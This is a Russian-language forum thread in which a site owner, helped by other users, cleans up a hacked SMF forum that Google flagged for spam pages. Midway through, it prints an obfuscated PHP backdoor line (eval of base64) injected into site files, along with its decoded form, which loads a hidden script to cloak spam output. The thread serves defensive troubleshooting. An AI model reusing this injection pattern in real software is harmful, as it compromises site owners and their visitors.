Возможно, данный сайт был взломан.

chilly86 · 20 апреля 2011, 21:16:52

Сегодня заметил, что гугл в результатах поиска рядом с ссылкой на мой форум добавил примечание: Возможно, данный сайт был взломан.

вот письмо в котором он объясняет причину:

ЦитироватьDear owner or webmaster of http://www.melik.com.ua/,

We are writing to let you know that some pages from http://www.melik.com.ua/ will be labeled as potentially compromised in our search results. This is because some of your pages contain content which may harm the quality and relevance of our search results. It appears that these pages were created or modified by a third party, who may have hacked all or part of your site. Many times, they will upload files or modify existing ones, which then show up as spam in our index.

The following are some example URLs which exhibit this behavior:

http://melik.com.ua/ixa-foku.htm

These URLs are using practices which do not follow our quality guidelines, which can be found here: http://www.google.com/support/webmasters/bin/answer.py?answer=35769&hl=en.

We encourage you to investigate this matter in order to protect your visitors. If your site was compromised, it's important to not only remove the malicious content from your pages, but also to identify and fix the vulnerability. Note that in many cases, this malicious content is hidden through a process known as cloaking. To learn what cloaking is, see http://www.google.com/support/webmasters/bin/answer.py?answer=66355&hl=en. You can confirm if your site is cloaking by using the Fetch as Googlebot tool: http://www.google.com/support/webmasters/bin/answer.py?answer=158587&hl=en. A good first step towards resolving the problem is to contact your web host's technical support for assistance. It's also important to make sure that your website's software is up-to-date with the latest security updates and patches.

More information about how to fix your site can be found at:

http://www.google.com/support/webmasters/bin/answer.py?answer=163634&hl=en

Once you've made sure your site is clean and secure, you can request reconsideration by going to https://www.google.com/webmasters/tools/reconsideration?hl=en.

я так понимаю, что ругается он именно на эту страничку, которую злоумышленник добавил

The following are some example URLs which exhibit this behavior:

http://melik.com.ua/ixa-foku.htm

при переходе по этой ссылке, открывается мой форум, но заголовок у него другой: Online printable baseball lineup cards

то, что нужно сменить пароли на фтп и я уже понял

подскажите, плиз, в какую сторону копать, чтобы удалить нехорошую ссылку??

добавлено:

вложил результат просмотра сайта Googlebot

Yworld_garry · 20 апреля 2011, 22:16:22

1) Чистим комп
2) Меняем пароли все
3) Смотрим логи, возможно там можно увидеть что то.
5) ищем файлы на которые долбились. Либо просто подозрительные и не ваши файлы.
6) перезаливаем из архива или чистый если нет возможности удалить руками.
Скорее всего все сидит в индексных файлах, но вариантов хватает.

chilly86 · 20 апреля 2011, 22:30:06

Цитата: Yworld_garry от 20 апреля 2011, 22:16:22
3) Смотрим логи, возможно там можно увидеть что то.

логи в админке? там пусто

Цитата: Yworld_garry от 20 апреля 2011, 22:16:22
5) ищем файлы на которые долбились. Либо просто подозрительные и не ваши файлы.

как бы еще узнать на которые

Цитата: Yworld_garry от 20 апреля 2011, 22:16:22
6) перезаливаем из архива или чистый если нет возможности удалить руками.

есть бэкапы за последние 10 дней
проблема в том, что я не знаю когда такое началось

Yworld_garry · 20 апреля 2011, 22:51:13

посмотрите в индексных файлах на подозрительные строчки, вверху и внизу страниц(как вариант)

chilly86 · 20 апреля 2011, 22:53:44

Цитата: Yworld_garry от 20 апреля 2011, 22:51:13
посмотрите в индексных файлах на подозрительные строчки, вверху и внизу страниц(как вариант)

спасибо, попробую

chilly86 · 21 апреля 2011, 09:58:30

итак была создана новая страница http://melik.com.ua/ixa-foku.htm
копия главной но с новой категорией:

все ссылки в новом разделе имеют вид:

http://melik.com.ua/ixa-q2zr8.htm
http://melik.com.ua/ixa-c5ohpy.htm
и т.д. и ведут опять же таки на копию главной, но в новой категории каждый раз новый контент (бейсбол. учёба, путешествия)

в индексовых файлах вроде бы ничего страшного не нашел, правда искатель из меня еще тот

сообщение от гугла датировано 12 числом, а мой последний бекап именно за эту дату, т.е. замена из бекапа ничего не даст

GeorG · 21 апреля 2011, 10:18:29

Возможно бэкап сделан несколько времени ранее (может час), чем был изменён код.

Yworld_garry · 21 апреля 2011, 10:38:40

Сравните файлы из чистого дистрибутива с вашими на ftp. И не знакомые удалите.

chilly86 · 21 апреля 2011, 11:05:37

Цитата: Yworld_garry от 21 апреля 2011, 10:38:40
Сравните файлы из чистого дистрибутива с вашими на ftp. И не знакомые удалите.

сравнил папки Sources и Themes\default
идентичны, за исключением php файлов модов симплпортала и кармы

искал вендовым поиском по запросу ixa-foku.htm
такие строки встречаются только в файле usage_201104

но это файл статистики...

даже не знаю что делать
спрошу у бывшего админа, который более компетентен в этом
если он не поможет - буду сначала удалять моды, и переустанавливать форум

chilly86 · 21 апреля 2011, 12:38:53

в некоторых в начале присутствовал код

Код Выделить

<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL2Jhc3RpbmRhL2RvbWFpbnMvbWVsaWsuY29tLnVhL3B1YmxpY19odG1sL2dhbGxlcnkvLnN2bi90bXAvcHJvcC1iYXNlL3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0=')); ?>

почистил все файлики, но результата пока нет

Yworld_garry · 21 апреля 2011, 13:03:33

Ловите раскодированную строчку, там указано что искать

Код Выделить

if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){$GLOBALS['mfsn']='/home/bastinda/domains/melik.com.ua/public_html/gallery/.svn/tmp/prop-base/style.css.php';if(file_exists($GLOBALS['mfsn'])){include_once($GLOBALS['mfsn']);if(function_exists('gml')&&function_exists('dgobh')){ob_start('dgobh');}}}

chilly86 · 21 апреля 2011, 13:35:20

Цитата: Yworld_garry от 21 апреля 2011, 13:03:33
Ловите раскодированную строчку, там указано что искать
Код Выделить Развернуть
if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){$GLOBALS['mfsn']='/home/bastinda/domains/melik.com.ua/public_html/gallery/.svn/tmp/prop-base/style.css.php';if(file_exists($GLOBALS['mfsn'])){include_once($GLOBALS['mfsn']);if(function_exists('gml')&&function_exists('dgobh')){ob_start('dgobh');}}}

спасибо огромнейшее, да я нашел в этом файле вредоносный код

удалил и оставил строки:

Код Выделить

<?php 

?>

верно?

и с остальных файлов удалил
на данный момент заливаю исправленные файлы на фтп

пс: прикрепил еще не исправленный style.css.php

Yworld_garry · 21 апреля 2011, 13:43:28

а разве должна быть такая папка вообще .svn?
я просто на работе и не помню что в галереи и тд. Может следует все удалить, тем более этот файл.

chilly86 · 21 апреля 2011, 13:46:18

Цитата: Yworld_garry от 21 апреля 2011, 13:43:28
а разве должна быть такая папка вообще .svn?
я просто на работе и не помню.

в этой папке /home/bastinda/domains/melik.com.ua/public_html/gallery/.svn/tmp/prop-base/
и лежали весь вредный контент и сам скрипт
все поудалял

спасибо Вам огромное, Yworld_garry за помощь и отзывчивость

теперь по этому адрему http://melik.com.ua/ixa-foku.htm как и должно быть - 404

еще раз спасибо!

Yworld_garry · 21 апреля 2011, 13:54:53

Все ок и это главное.
Не храните пароли от фтп и акков на компе и во всяких клиентах. Увести их не так сложно.
Пару паролей не сложно запомнить.

chilly86 · 21 апреля 2011, 14:06:35

Цитата: Yworld_garry от 21 апреля 2011, 13:54:53
Все ок и это главное.
Не храните пароли от фтп и акков на компе и во всяких клиентах. Увести их не так сложно.
Пару паролей не сложно запомнить.

Уже заучиваю